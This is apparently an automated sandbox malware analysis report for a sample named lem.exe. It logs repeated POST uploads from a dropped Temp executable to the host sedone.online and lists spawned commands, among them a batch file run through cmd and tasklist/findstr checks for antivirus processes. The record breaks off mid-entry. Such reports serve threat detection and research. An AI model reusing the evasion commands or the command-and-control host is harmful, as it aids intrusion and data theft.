                                                                                                                                                                                                                                                                                          2024-12-15 19:48:40 UTC1977OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------GVA1VKFU3EKF3E37900ZCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:41 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          35192.168.2.449882116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:41 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----GVA1VKFU3EKF3E37900Z
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 3161
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:41 UTC3161OUTData Raw: 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 56 41 31 56 4b 46 55 33 45 4b 46 33 45 33 37 39 30 30 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------GVA1VKFU3EKF3E37900ZContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------GVA1VKFU3EKF3E37900ZCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:42 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          36192.168.2.449888116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:43 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 1697
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:43 UTC1697OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------26XB16PZUA1VAASJ5PHVCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:44 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:44 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          37192.168.2.449893116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:44 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8QQ9HVKF37QIE3EUKXLF
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 1929
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:44 UTC1929OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 38 51 51 39 48 56 4b 46 33 37 51 49 45 33 45 55 4b 58 4c 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------8QQ9HVKF37QIE3EUKXLFContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------8QQ9HVKF37QIE3EUKXLFCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:45 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:45 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          38192.168.2.449899116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:47 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----L6XBI5FCBIEUAIEK6PPP
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 453
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:47 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------L6XBI5FCBIEUAIEK6PPPCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:47 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:47 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          39192.168.2.449905116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----1NYU3OHDJMYU3ECBA1NY
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 4f 48 44 4a 4d 59 55 33 45 43 42 41 31 4e 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------1NYU3OHDJMYU3ECBA1NYContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------1NYU3OHDJMYU3ECBA1NYCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:50 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          40192.168.2.449912116.203.12.2414435496C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:52 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----4E37Q1NOHDJE37900ZMY
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: sedone.online
                                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:52 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 36 65 33 30 36 38 66 63 61 35 39 35 39 61 33 39 63 36 61 39 32 37 65 37 37 66 61 31 61 65 32 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 34 45 33 37 51 31 4e 4f 48 44 4a 45 33 37 39 30 30 5a 4d 59 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="token"f6e3068fca5959a39c6a927e77fa1ae2------4E37Q1NOHDJE37900ZMYContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------4E37Q1NOHDJE37900ZMYCont
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:53 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Sun, 15 Dec 2024 19:48:53 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-15 19:48:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                                          Start time:14:46:59
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\lem.exe"
                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                          File size:978'099 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:27B18A5E8BDAA950AF93633A821C2BFA
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                                          Start time:14:46:59
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Cheats Cheats.cmd && Cheats.cmd
                                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                                          Start time:14:46:59
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                                          Start time:14:47:00
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                          Imagebase:0x310000
                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                                          Start time:14:47:00
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                          Imagebase:0xf00000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                                          Start time:14:47:02
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                                          Imagebase:0x310000
                                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                                          Start time:14:47:02
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                          Imagebase:0xf00000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                                          Start time:14:47:03
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:cmd /c md 628056
                                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                                          Start time:14:47:03
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                          Commandline:findstr /V "Cleared" Penalties
                                                                                                                                                                                                                                                                                          Imagebase:0xf00000
                                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                          Start time:14:47:03
                                                                                                                                                                                                                                                                                          Start date:15/12/2024
                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
